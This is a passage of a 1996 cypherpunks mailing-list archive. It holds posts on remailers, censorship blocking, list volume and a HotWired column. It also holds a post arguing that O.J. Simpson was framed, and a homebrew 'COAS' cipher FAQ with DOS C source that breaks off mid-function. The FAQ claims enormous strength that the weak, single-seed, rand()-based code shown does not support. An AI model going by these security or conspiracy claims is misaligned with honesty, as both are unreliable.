goes through a certain remailer, no matter who sends it. And I thought it
was one particular idiot.  Turns out, it's any number of people, plus one
particular idiot. 

--
         to unsubscribe write to majordomo@toad.com with the words
                          unsubscribe cypherpunks
               in the body (not the subject) of the message.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 1 Oct 1996 15:46:20 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <Pine.SUN.3.94.961001002354.20271A-100000@polaris>
Message-ID: <Pine.3.89.9609302221.A10306-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, Black Unicorn wrote:

> 
> Signs of unrest in the nation's capital.
> 
> These signs began to appear all over yesterday.
> 
> WARNING
> THIS AREA HAS BEEN
> DECLARED A DRUG FREE ZONE

Assuming you aren't joking, would somebody please please take a 
photograph of such a sign and post it on the web?

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Tue, 1 Oct 1996 13:07:37 +0800
To: cypherpunks@toad.com
Subject: Re: ASAP letter on e-cash
Message-ID: <199610010237.WAA52166@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Sep 30 22:35:53 1996
Dustbin Freedom Remailer wrote:

>
>It seems our own Jim Ray has gotten published again, this time in Forbes 
>ASAP's letters section ((Oct.7, page 18). A bit partisan-Libertarian,

Well, that's to be expected from me...Besides, Reason editor Virginia 
Postrel is a columnist there.

>but good job, Jim.

Thanks. They only cut it a little bit, and I hear it may appear somewhere 
electronically soon. If not, I'll dig for anyone interested. ASAP makes 
Forbes worth subscribing to, IMO.
JMR


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:jmr@shopmiami.com> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlCDjm1lp8bpvW01AQGNTQQAmQmKZZU8VQWRziV4LEyXxhCKThz2rilA
k5gHDsEdkNNynvgd4luAUGEA1P3GGXnDVe3L7ByaCVjz8QksCDuPVM/MH1ZFMoVn
pgMZZKkE+HjpDcUXJjRe88Duq8JJw4fZKfE4M+wxyyONQtsVF1+maut2HDzdrcU3
kbE1JQ10+qc=
=n4Jb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 1 Oct 1996 16:06:07 +0800
To: cypherpunks@toad.com
Subject: Re: active practice in America [RANT]
In-Reply-To: <199609290438.WAA23813@infowest.com>
Message-ID: <3250AF4E.45C6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Re: Below text.  One of the most fascinating aspects of the Simpson case
(to me, anyway) is how persons who know about conspiracies, mafia hits,
etc., are still willing to believe OJ is guilty (fer sure), looking only
at the "evidence" presented by the same folks who (send for list).

I spent many days at the house, talked to a lot of people, read a lot of
material, in short, I researched the case, and here's what I found:

Remember the pictures of Nicole that got so much coverage?  Edited on a
computer by National Enquirer, as they have done on so many other jobs.
Interesting that Enquirer used the same company which "verified" the
Oswald photos for the Bruno Magli shoe photos of OJ.  This company's
main business is propaganda and disinformation for govt. agencies.

Funny OJ would wear sneakers to McDonalds, change to Brunos for the hit,
then change again after showering.  Work clothes and dress shoes, hmmm.

Is Simpson an abuser?  Get a video of Joel Steinberg's wife's testimony;
see an abused person, for real.
Challenge: Find one instance in OJ's life where he hit someone (for
real), and caused:  1) a broken bone, dislodged or chipped tooth.
                    2) a cut requiring at least one stitch.
                    3) any other real injury.
The point is *not* that OJ didn't inflict mental cruelty and a certain
level of "yuppie violence", but don't insult me with the notion that OJ
somehow compares to real domestically-violent men, some of whom I know.

The idea that the police found a few drops of Simpson's blood in the
middle of two gallons (500,000 drops?) of victim blood is about as
likely as "Oswald" shooting Tippit with a revolver and leaving empty
cartridges at the scene, near the body.  And remember, "Oswald" left a
plethora of other "evidence", too.

So where would they get OJ's blood?  Try Cedars-Sinai.  OJ left blood
there more than once, and plenty of it.

Did you know that Al Cowlings (drove the bronco) was a/the driver for
alleged mobster Joey Ippolito?  Joey disappeared just before the hit on
Ron and Nicole.  OJ's alleged coke partner from Buffalo was iced with a
couple of girls days after.  Denise Brown (battered women foundation)
sits in open court with her date Tony "The Animal" Fiato, another
mobster on the Witness Protection program.  Ron's psychiatrist's office
is broken into a la Daniel Ellsberg, and Ron's file is stolen.

Do you see anything fishy about any of this?  I, like many other people, 
was glued to the TV when they led "Oswald" out to the car.  I saw Ruby 
do the hit.  If you've seen one Untouchables (circa 1959) melodrama, 
you've seen them all, and with Ruby, the glove did indeed fit.  Please 
don't be another sucker for the govt. on this one.

Timothy C. May wrote:
> At 11:32 PM -0700 9/29/96, Dale Thorn wrote:
> >Speaking of peers, what would the founding fathers have said about the
> >trial of the officers in the Rodney King case?  Would they, as police
> >officers, have a right to a jury of their peers?  Would their peers be
> >the people in Simi Valley, where many or most of them live?  Or would it
> >be more appropriate to have a jury of the victims' peers?  Or both?
>
> More importantly, what's happened to "double jeapardy"? The four cops were
> found "Not Guilty" in their criminal trial (or at least three of them
> were...I forget the details--one may have been a mistrial).

> So, as some people then proceeded to burn down their neighborhoods, loot,
> and run amok in the streets for several days, a _second_ trial was held.
> This time the verdicts were more in line with what the street wanted, plus,
> all the good electronics stores had already been looted or had moved out of
> South Central, so no riots.
>
> (Legal purists will point out that the second trial was for "Federal civil
> rights violations." Harummphh. What would the Founders think of this logic:
> "First we try them on ordinary criminal charges. If they are found Not
> Guilty, we charge them in the next higher court with more abstract charges.
> If they are still found found Not Guilty, we hit them with "civil rights"
> and "being disrespectful to women" charges. And if that doesn't work, we
> charge them in the World Court. We've only had one guilty party get past
> them, and for that guy we appealed to the Pope and he put a Papal Hex on
> the guy and ordered him burned in oil.")
>
> Double jeapardy means the system gets one shot at proving charges, not two
> or three.
>
> (And, yes, even though I am sure O.J. Simpson killed those two people, I am
> not happy with what appears to be a _second_ trial. For sure, it's a
> _civil_ trial, for damages, but to this layman it looks like a second trial
> on the main charges. I suppose I always thought that being found "Not
> Guilty" on the act itself made it essentially impossible for a civil trial
> to redecide the same issue. Boy, was I wrong.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 1 Oct 1996 15:52:23 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: Tools for Rendering Censorship Firewalls Ineffective
Message-ID: <199610010544.WAA11355@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:24 PM 9/30/96 +0200, Gary Howland <gary@systemics.com> wrote:
>I would guess that most sites censoring http by IP would be doing so by
>only censoring the http port.  If the http servers were to be run on
>other ports too (perhaps well known ports like DNS), then this would
>make life a little harder for the bad guys.  

That's trivial - most web server software is happy to use ports
other than 80 if you tell it to, and it's not uncommon to see
web servers running on ports 8000 or 8080, especially if they're
run by regular users rather than root (which you need for port 80
on many Unix systems.)  Does anybody know if the German ISPs were
blocking XS4ALL's IP address just on port 80, on all ports, or on all but 25?

Using important well-known ports like DNS is inviting real trouble.
Borrowing from other protocols such as Quote-Of-The-Day or supdup
probably won't bother many people, though ports under 1024 may still
require root's cooperation and may be looked at skeptically by firewalls.


>I have some encrypted HTTP relay software if anyone is interested in
>setting up a server.

That could be interesting - do you have it on a web/ftp site?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 1 Oct 1996 16:02:58 +0800
To: Travis Hassloch x231 <travis@evtech.com>
Subject: Re: The Nature of the Cypherpunks List
Message-ID: <199610010544.WAA11372@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:11 PM 9/30/96 -0500, Travis Hassloch x231 <travis@evtech.com> wrote:
>here here.  400 messages in less than a week, with no digest, no moderated
>equivalent and no explanation for the "-ratings" list?
>who has time for that?  i'm interested in crypto but
>i have a hard time believing any serious researcher could sift through all
>the messages and still have time left to eat & breathe, much less code!
...
>i am interested in any alternatives, cypherpunks readers...
>other mailing lists that are serious about crypto, security, etc.
>wasn't there talk at one time of a list for coders? 

Cypherpunks-announce@toad.com has one or two postings a month,
mainly Bay Area cypherpunks meetings.  cypherpunks-announce-request for info.

You can read cypherpunks with a newsreader at nntp.hks.net ;
use all your favorite newsreading tools to filter and organize it.

You can get 5-10% of the volume from filtered lists from Ray Arachelian 
or Eric Blossom.  (Ray's FCPUNX list is at either sunder@dorsai.org or
sunder@brainlink.com if he's moved it.  Send mail with Subject: help fcpunx 
There's a digested form of the list.  It's free.
Eric's at eb@comsec.com ; cypherpunks-light costs @20/year.)

Coderpunks@toad.com is a lower-volume code-related-discussion-only list.
Send mail to coderpunks-request@toad.com for help.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omegaman@bigeasy.com>
Date: Tue, 1 Oct 1996 14:03:42 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Katz on cypherpunks, in HotWired's Media Rant
In-Reply-To: <v03007800ae75cceb36a2@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.960930224330.497C-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Sep 1996, Timothy C. May wrote:

> 
> Katz has no understanding of the difference between someone (or some bunch)
> who use a name-password combination called "cypherpunks" with the
> discussions on the _list_ called cypherpunks.

No he does not.   I pointed this out to him in private mail after reading
the text of the "rant" at hotwired.  He says that he makes the distinction a
number of times throughout the article between "the person who logs in
internally" from hotwired " and the "cypherpunks mailing group."

I replied, "no, Jon, you did not...and I suspect that I am not the only
reader of your article who thinks so."  

I will be most interested in his reply.  

> His comment, "Cypherpunks don't want real confrontations or discussions, or
> they would reveal their identities and make it possible to respond, as most
> flamers do. They are among media's rarest and at the same time most
> easily recognized subspecies: nihilists." shows the same level of
> sophistication as someone accusing Bill Clinton of misdeeds because
> "whitehouse.gov" is used as a name/password for some forum.
> 
> Someone this naive (or this disingenous, if he knows better) has no
> business writing for anything about the Net.
> 
> Once again, "Wired" and "HotWired" disgrace themselves.
> 
> --Tim May
> 

Anyone care to wager that he won't post any sort of correction or addendum
in a later forum?

me

_______________________________________________________________
 Omegaman <mailto: omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63
 Send e-mail with "get key" in the "Subject:" field
 to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 1 Oct 1996 17:11:21 +0800
To: silly@ugcs.caltech.edu
Subject: [CRYPTO] Cryptography of a sort [FAQ]
Message-ID: <3250B112.154@gte.net>
MIME-Version: 1.0
Content-Type: text/plain

Attached is FAQ, source code, and documentation for a program I've
arbitrarily called "Cryptography Of A Sort" (COAS).  If anyone is
using that acronym for something which could conflict, I guess I'd
have to change it....

The FAQ is self-explanatory.  The source code contains an unoptimized
routine or two; the line comments should take care of that.  Following
the source code is the user documentation.

FAQ:      132 lines
Source:   349 lines
User doc:  60 lines

I've been programming since Feb. 2, 1975, when I bought my first HP-65.
21.66 years and 30 or so personal computers later, I have an HP-48GX,
a Win95 laptop, and an HP-200LX with an 85 mb flash card STAC'd 170 mb.

I've done several national articles, the last in Dr. Dobb's, June 1991.

I prefer languages which offer medium-to-high-level calls along with
direct OS/BIOS/etc. access, although the HP-48 RPL is kinda fun....


FAQ for Cryptography Of A Sort (COAS)
Author  : Dale Thorn <dthorn@gte.net>
Revised : 29 Sep 1996

[Source code and documentation follow this FAQ]

Q: Is COAS an actual product?
A: COAS is an encryption engine supplied in source-code format, which
   calls some commonly-available (and replaceable) functions included
   with commercial computer-language libraries, which in turn perform
   some of the rudimentary tasks required by the program.  Public Key
   features are not currently supported in COAS, therefore, messaging
   applications are not as well supported as is local file encryption.

Q: What are the main differences between COAS and other non-messaging-oriented
   crypto products?
A: 1. COAS repositions bits based on multiple encoding passes using one or more
      Pseudo-Random Number Generators (PRNG's).  Since COAS is provided only in
      source code format, and since the source code calls the PRNG function in
      the compiler library(s), COAS is actually independent of specific PRNG's.
      NOTE: PRNG limitations, as described in the popular literature, do not
            necessarily apply when repositioning bits in multiple passes, as
            opposed to modifying bits as is normally done in other software.
            Think of "brute force encryption" (more on this below).
   2. COAS does not use a "key" as such, and thus does not "encrypt" the bits
      in a text bitstream.  Instead, it uses an input value (text or numeric)
      as an entry point into a common PRN sequence.  Since the entry point is
      a secret, and since bits are moved using random block sizes, from their
      original bytes into unrelated destination bytes, cryptanalytic attempts
      must necessarily begin with brute-force guessing as to the entry points
      in the PRN sequences, in order to associate the correct bits with their
      original bytes of text.  Multiple encoding passes raise the number of
      guesses exponentially.
   3. COAS source code is extremely small, the primary intent for which was
      to provide a sample encoding engine for local/personal computer files.
      Due to its small size and simplicity, the source code can be easily
      modified by casual users, who may add in their own custom routines.
      NOTE: It cannot be overemphasized, that crypto programs which have
            a widely-respected reputation must also be held suspect when
            A) The very nature of those programs is to deceive, -and-
            B) The source code is either not available, or is so complex
               as to discourage ordinary people from working with it.

Q: But if COAS uses a common, ordinary PRNG, how can it possibly be secure?
A: I can think of two arguments against using PRNG's:
   1. Encoded text is easy to decode by brute force on most computers, -and-
   2. Encoded text can be seen as having regular patterns when "viewed" from
      the vantage point of programs employing higher-dimensional mathematics.
   Addressing the former, a single-pass encryption of a text file using the
   typical PRNG might be breakable in as little as .000001 second on one of
   the larger, faster computers available, however, the same approach might
   require as many as 10^24 years if the number of encoding passes reaches
   ten or more.  To simplify: try to guess the number I'm thinking between
   zero and 32,000.  You can make 16 billion guesses per second, so it will
   take only .000001 second (on average) to get the correct answer.  If you
   had to guess ten numbers correctly (and sequentially), it would require
   roughly (16,000^10) / 16,000,000,000 seconds, approximately 10^24 years.
   Addressing the latter, the ability to "view" the text as a lattice in a
   higher dimension is likewise diminished by the discontinuities inherent
   in multi-pass encoding, when bit-group sizes are determined dynamically
   by PRN's following the secret entry points into the PRNG sequences.

Q: What about the possibility that two or more encryption passes could be
   decrypted in a single pass, as in the scenario where a third key K3 is
   functionally equivalent to two separate encrypting keys K1 and K2?
A: Since COAS encoding is controlled through entry points into a PRNG's
   number sequences (adjacent encryptions may also use different PRNG's
   and/or bit-move logic), searching for a "key" or algorithm which can
   unpack two or more layers of coding will prove futile when all entry
   points into the PRNG's are different, and different PRNG's are used.
   A couple of points to consider:
   One, the output of the PRNG (or any number series) does not describe
   the bit move-to locations; those are determined by sorting the PRN's
   then moving the bits according to the sequence of the original array
   positions of the PRN's prior to sorting. Since some of the PRN's are
   duplicates, the original array positions relative to each other will
   be determined by chance, i.e., the vagaries of the sort process, etc.
   Two, since the bits are moved rather than modified, and since groups
   of bits vary in size, an attempt to find particular bits that belong
   to specific bytes after multi-move shuffling, using any compound key
   or algorithm in a single decoding pass, will certainly prove futile.

Q: Since the personal computer implementation of COAS uses 16-bit integers to
   initialize (set entry points into) the PRNG's, would ten encryption passes
   be somehow equivalent to the use of a 160-bit key in conventional programs?
A: If the conventional program used a 160-bit key in a manner similar to COAS,
   it would still have to:  1) move bits, not change them. 2) use an indirect
   method for specifying move locations.  3) model the processes used in COAS
   quite closely, since there's no straightforward mathematical approach that
   can duplicate the conditions described in the previous question and answer.

Q: What's the difference between the techniques used by COAS and the use of a
   One-Time Pad (OTP)?
A: The theory behind the OTP assumes that (unlike the use of a Public/Private
   key) subsequent encryptions using the same OTP key would reveal the nature
   of the OTP, i.e., any newly-encoded files and messages would share certain
   common identifiable characteristics which could be exploited to facilitate
   the decryption of all files using that pad.
   COAS, on the other hand, doesn't alter any of a file's bits, and therefore
   does not "add" its PRNG entry points' characteristics to a file other than
   shuffling bits in accordance with the original physical positions of PRN's
   which have been sorted by size.

Q: Is it possible for anyone to alter the contents of files encrypted by COAS
   so that a person performing the eventual decryption would not realize that
   the file(s) were indeed altered?
A: Less likely than incidental or brute-force decryption.  Each bit is moved
   once in each encryption pass, and if any bits were moved or changed, that
   many bytes (or nearly as many, since bits are not moved in byte-divisible
   groups, so most will end up in unrelated bytes after encryption) would be
   affected, and the resulting bytes would not likely pass even the simplest
   checksum test.

Q: Is COAS a "weak" product (cryptographically speaking), either because of
   limitations in its own internal algorithms, or in the commercial library
   functions it calls?
A: COAS can be used in ways that produce weak encryption, which is really
   an advantage in encouraging beginners to get started, given its simple
   user interface. Whether it can produce "strong" encryption or not is a
   matter of opinion, where said opinion is not so much a function of the
   product's alleged weaknesses, as it is the fact that cryptography grew
   up from a long history of hand-ciphering and the mathematics attending
   that growth, and the obvious resistance to new paradigms in this field.
   While mathematical proof of encryption strength is highly desirable in
   most applications (some would argue essential in certain applications),
   I see things this way:  Computer software of any kind, which cannot be
   analyzed by common persons (average programmers), whose innards cannot
   be exposed to the masses for whatever reason, should not be used where
   it could effect control over the lives of those people.  Looking at it
   a different way, it's wise for any individual or group to evaluate the
   software that's available, and make their own judgements independently
   of "expert opinion" in the field.
*******************************************************************************
*******************************************************************************
*******************************************************************************
/* CCRP.C  Encrypt/Decrypt a DOS file */
/*         By: Dale Thorn             */
/*         Version 2.9                */
/*         Rev. 03.07.1996            */

#include "stdlib.h"
#include "string.h"
#include "stdio.h"
#include "dos.h"
#include "io.h"
#include "ccrp.h"

V main(I argc, C **argv) {     /* command-line arguments (input file/offset) */
   C cmsg[23];                         /* initialize the User message string */
   U ibit = 0;                          /* initialize the bit offset in cbuf */
   U ibuf = 2048;                          /* set maximum file buffer length */
   U idot;                    /* initialize the filename extension separator */
   I ieof = 0;                                    /* initialize the EOF flag */
   U ilen;                         /* initialize a temporary length variable */
   U indx;                           /* initialize a temporary loop variable */
   I iopr;                                  /* initialize the operation code */
   U irnd = 0;                             /* initialize the randomizer seed */
   L lbyt;                           /* initialize the file pointer variable */
   L llof;                            /* initialize the file length variable */
   L lrnd = 0;                      /* initialize the randomizer accumulator */
   U _far *uvadr = 0;                               /* video display pointer */
   struct _iobuf *ebuf;                      /* source file access structure */

   C *cbuf = (C *)malloc(2048);                /* initialize the file buffer */
   C *ctmp = (C *)malloc(2048);                /* initialize the temp buffer */
   I *int1 = (I *)malloc(3074);             /* allocate the sort index array */
   I *int2 = (I *)malloc(3074);     /* allocate the sort random number array */
   I *istk = (I *)malloc(3074);             /* allocate the sort stack array */

   if (argc == 1) {                       /* a command line was not supplied */
      ifn_msgs("Usage:  CCRP(v2.9)  filename  [/e /d]  [key]", 4, 24, 79, 0, 1);
   }                           /* display the usage message [above] and exit */
   if (argc < 3 || argc > 4) {     /* no. of parameters should be one or two */
      ifn_msgs("Invalid number of parameters", 4, 24, 79, 1, 1);
   }                   /* display no.-of-parameters message [above] and exit */
   if (argv[2][0] != '/') {             /* slash preceding parameter missing */
      ifn_msgs("Invalid operation parameter", 4, 24, 79, 1, 1);
   }                   /* display invalid-parameter message [above] and exit */
   strupr(argv[1]);                                /* uppercase the filename */
   strupr(argv[2]);                          /* uppercase the operation code */
   if (argv[2][1] != 'D' && argv[2][1] != 'E') {        /* invalid parameter */
      ifn_msgs("Invalid operation parameter", 4, 24, 79, 1, 1);
   }                   /* display invalid-parameter message [above] and exit */
   idot = strcspn(argv[1], "."); /* position of filename extension separator */
   ilen = strlen(argv[1]);                             /* length of filename */
   if (idot == 0 || idot > 8 || ilen - idot > 4) {     /* filename tests bad */
      ifn_msgs("Invalid filename", 4, 24, 79, 1, 1);
   }                    /* display invalid-filename message [above] and exit */
   if (idot < ilen) {                 /* filename extension separator found! */
      if (strcspn(argv[1] + idot + 1, ".") < ilen - idot - 1) {/* 2nd found! */
         ifn_msgs("Invalid filename", 4, 24, 79, 1, 1);
      }                 /* display invalid-filename message [above] and exit */
   }
   strcpy(cmsg, argv[1]);                        /* copy filename to message */
   strcat(cmsg, " not found");                 /* add "not found" to message */
   ebuf = fopen(argv[1], "rb+");                   /* open the selected file */
   llof = filelength(fileno(ebuf));           /* filelength of selected file */
   if (ebuf == NULL || llof == -1L || llof == 0) {/* length=0 or call failed */
      fclose(ebuf);                                        /* close the file */
      remove(argv[1]);                          /* kill the zero-length file */
      ifn_msgs(cmsg, 4, 24, 79, 1, 1);           /* display message and exit */
   }
   iopr = argv[2][1] - 68;          /* operation code (1=encrypt, 2=decrypt) */
   if (argc == 4) {                               /* a seed key was supplied */
      ilen = strlen(argv[3]);                 /* length of optional seed key */
      for (indx = 0; indx < ilen; indx++) {     /* loop through the seed key */
         irnd = argv[3][indx];                 /* character at byte position */
         switch (indx % 3) {                  /* select on byte significance */
            case 0:                                /* least significant byte */
               lrnd += irnd;                     /* add to randomizer accum. */
               break;
            case 1:                            /* 2nd least significant byte */
               lrnd += (L)irnd * 256;            /* add to randomizer accum. */
               break;
            case 2:                                 /* most significant byte */
               lrnd += (L)irnd * 65536;          /* add to randomizer accum. */
               break;
            default:
               break;
         }
      }
      irnd = (U)(lrnd % 32640) + 1;       /* mod randomizer seed to <= 32640 */
   }
   ifn_msgs("Please standby", 4, 24, 79, 0, 0);           /* standby message */

   srand(irnd);                    /* initialize the random number generator */
   for (lbyt = 0; lbyt < llof; lbyt += ibuf) {/* proc. file in ibuf segments */
      if (lbyt + ibuf >= llof) {    /* current file pointer + ibuf spans EOF */
         ibuf = (U)(llof - lbyt);        /* reset maximum file buffer length */
      /* cbuf = ""                                 /* deallocate file buffer */
      /* cbuf = space$(ibuf)                       /* reallocate file buffer */
         ieof = 1;                                    /* set the EOF flag ON */
      }
      fseek(ebuf, lbyt, SEEK_SET);                 /* set file-read position */
      fread((V *)cbuf, 1, ibuf, ebuf);     /* read data into the file buffer */
      while (1) {                      /* loop to process bit groups in cbuf */
         ilen = (rand() / 26) + 256;/* buffer seg. bit-len.: 256<=ilen<=1536 */
         if (ibit + ilen > ibuf * 8) {/* current bit-pointer+ilen spans cbuf */
            if (ieof) {                                    /* EOF flag is ON */
               ilen = ibuf * 8 - ibit; /* reset bit-length of buffer segment */
            } else {                 /* EOF flag is OFF; adjust file pointer */
               fseek(ebuf, lbyt, SEEK_SET);       /* set file-write position */
               fwrite((V *)cbuf, 1, ibuf, ebuf);/* save curr. buffer to file */
               lbyt -= (ibuf - ibit / 8);/* set file ptr to reload from ibit */
               ibit %= 8;            /* set ibit to first byte of <new> cbuf */
               break;                  /* exit loop to reload cbuf from lbyt */
            }
         }                 /* encrypt or decrypt the current segment [below] */
         ifn_cryp(int1, int2, istk, cbuf, ctmp, (I)ibit, ilen, iopr);
         ibit += ilen;                 /* increment ibit to next bit-segment */
         if (ibit == ibuf * 8) {        /* loop until ibit == length of cbuf */
            fseek(ebuf, lbyt, SEEK_SET);          /* set file-write position */
            fwrite((V *)cbuf, 1, ibuf, ebuf);/* write current buffer to file */
            ibit = 0;                /* set ibit to first byte of <new> cbuf */
            break;
         }
      }
   }
   ifn_msgs("Translation complete", 4, 24, 79, 0, 1);/* disp. message & exit */
}

I bitget(C *cstr, I ibit) {                 /* get a bit-value from a string */
   I ival;                                       /* initialize the bit value */

   switch (ibit % 8) {                    /* switch on bit# within character */
      case 0:                                  /* bit #0 in target character */
         ival = 1;                                        /* value of bit #0 */
         break;
      case 1:                                  /* bit #1 in target character */
         ival = 2;                                        /* value of bit #1 */
         break;
      case 2:                                  /* bit #2 in target character */
         ival = 4;                                        /* value of bit #2 */
         break;
      case 3:                                  /* bit #3 in target character */
         ival = 8;                                        /* value of bit #3 */
         break;
      case 4:                                  /* bit #4 in target character */
         ival = 16;                                       /* value of bit #4 */
         break;
      case 5:                                  /* bit #5 in target character */
         ival = 32;                                       /* value of bit #5 */
         break;
      case 6:                                  /* bit #6 in target character */
         ival = 64;                                       /* value of bit #6 */
         break;
      case 7:                                  /* bit #7 in target character */
         ival = 128;                                      /* value of bit #7 */
         break;
      default:
         break;
   }
   return ((cstr[ibit / 8] & ival) != 0);      /* return value of target bit */
}

V bitput(C *cstr, I ibit, I iput) {           /* put a bit-value to a string */
   I ival;                                       /* initialize the bit value */
   I ipos = ibit / 8;                     /* position of 8-bit char. in cstr */

   switch (ibit % 8) {                    /* switch on bit# within character */
      case 0:                                  /* bit #0 in target character */
         ival = 1;                                        /* value of bit #0 */
         break;
      case 1:                                  /* bit #1 in target character */
         ival = 2;                                        /* value of bit #1 */
         break;
      case 2:                                  /* bit #2 in target character */
         ival = 4;                                        /* value of bit #2 */
         break;
      case 3:                                  /* bit #3 in target character */
         ival = 8;                                        /* value of bit #3 */
         break;
      case 4:                                  /* bit #4 in target character */
         ival = 16;                                       /* value of bit #4 */
         break;
      case 5:                                  /* bit #5 in target character */
         ival = 32;                                       /* value of bit #5 */
         break;
      case 6:                                  /* bit #6 in target character */
         ival = 64;                                       /* value of bit #6 */
         break;
      case 7:                                  /* bit #7 in target character */
         ival = 128;                                      /* value of bit #7 */
         break;
      default:
         break;
   }
   if (iput) {                                       /* OK to set the bit ON */
      if (!(cstr[ipos] & ival)) {                   /* bit is NOT already ON */
         cstr[ipos] += ival;                    /* set bit ON by adding ival */
      }
   } else {                                         /* OK to set the bit OFF */
      if (cstr[ipos] & ival) {                     /* bit is NOT already OFF */
         cstr[ipos] -= ival;                    /* set bit OFF by subt. ival */
      }
   }
}

V ifn_cryp(I *int1, I *int2, I *istk, C *cbuf, C *ctmp, I ibit, I ilen, I iopr) {
   I indx;                           /* initialize the for-next loop counter */

   for (indx = 0; indx < ilen; indx++) { /* loop through ilen array elements */
      int1[indx] = indx;             /* bit offsets from current ibit offset */
      int2[indx] = rand();         /* random number values for sort function */
   }
   ifn_sort(int1, int2, istk, ilen - 1);    /* Quicksort by random no. array */
   memcpy(ctmp, cbuf, 2048);  /* copy data buffer to temp destination buffer */
   if (iopr) {                                          /* encrypt operation */
      for (indx = 0; indx < ilen; indx++) { /* loop thru ilen array elements */
         bitput(ctmp, indx + ibit, bitget(cbuf, int1[indx] + ibit));/*encrypt*/
      }
   } else {                                             /* decrypt operation */
      for (indx = 0; indx < ilen; indx++) { /* loop thru ilen array elements */
         bitput(ctmp, int1[indx] + ibit, bitget(cbuf, indx + ibit));/*decrypt*/
      }
   }
   memcpy(cbuf, ctmp, 2048);  /* copy temp destination buffer to data buffer */
}

V ifn_msgs(C *cmsg, I iofs, I irow, I icol, I ibrp, I iext) {/* display msgs */
   io_vcls(7);                                           /* clear the screen */
   io_vdsp(cmsg, 4, iofs, 7);                    /* display the user message */
   if (ibrp) {                              /* OK to sound user-alert (beep) */
      printf("\a");                                  /* sound the user-alert */
   }
   if (iext) {                                     /* OK to exit the program */
      io_vcsr(5, 0, 0);                               /* relocate the cursor */
      fcloseall();                                   /* close all open files */
      exit(0);                                              /* return to DOS */
   } else {                                       /* do NOT exit the program */
      io_vcsr(irow, icol, 0);                           /* 'hide' the cursor */
   }
}

V ifn_sort(I *int1, I *int2, I *istk, I imax) {  /* array Quicksort function */
   I iext;                            /* initialize the outer-loop exit flag */
   I ilow;                               /* initialize the low array pointer */
   I irdx = 0;                                  /* initialize the sort radix */
   I isp1;                               /* initialize the low stack pointer */
   I isp2;                               /* initialize the top stack pointer */
   I itop;                               /* initialize the top array pointer */
   I iva1;                  /* initialize array value from low stack pointer */
   I iva2;                  /* initialize array value from low stack pointer */

   istk[0] = 0;                          /* initialize the low array pointer */
   istk[1] = imax;                       /* initialize the top array pointer */
   while (irdx >= 0) {                          /* loop until sort radix < 0 */
      isp1 = istk[irdx + irdx];                 /* set the low stack pointer */
      isp2 = istk[irdx + irdx + 1];             /* set the top stack pointer */
      irdx--;                                    /* decrement the sort radix */
      iva1 = int1[isp1];           /* get array value from low stack pointer */
      iva2 = int2[isp1];           /* get array value from low stack pointer */
      itop = isp2 + 1;                          /* set the top array pointer */
      ilow = isp1;                              /* set the low array pointer */
      while (1) {                     /* loop to sort within the radix limit */
         itop--;                          /* decrement the top array pointer */
         if (itop == ilow) {         /* top array pointer==low array pointer */
            break;                               /* skip to next radix value */
         }
         if (iva2 > int2[itop]) {   /* value @low pointer>value @top pointer */
            int1[ilow] = int1[itop];        /* swap low and top array values */
            int2[ilow] = int2[itop];        /* swap low and top array values */
            iext = 0;                     /* initialize outer-loop exit flag */
            while (1) {             /* loop to compare and swap array values */
               ilow++;                    /* increment the low array pointer */
               if (itop == ilow) {   /* top array pointer==low array pointer */
                  iext = 1;                   /* set outer-loop exit flag ON */
                  break;                         /* skip to next radix value */
               }
               if (iva2 < int2[ilow]) {   /* value @low ptr.<value @low ptr. */
                  int1[itop] = int1[ilow];  /* swap top and low array values */
                  int2[itop] = int2[ilow];  /* swap top and low array values */
                  break;               /* repeat sort within the radix limit */
               }
            }
            if (iext) {                        /* outer-loop exit flag is ON */
               break;                            /* skip to next radix value */
            }
         }
      }
      int1[ilow] = iva1;           /* put array value from low stack pointer */
      int2[ilow] = iva2;           /* put array value from low stack pointer */
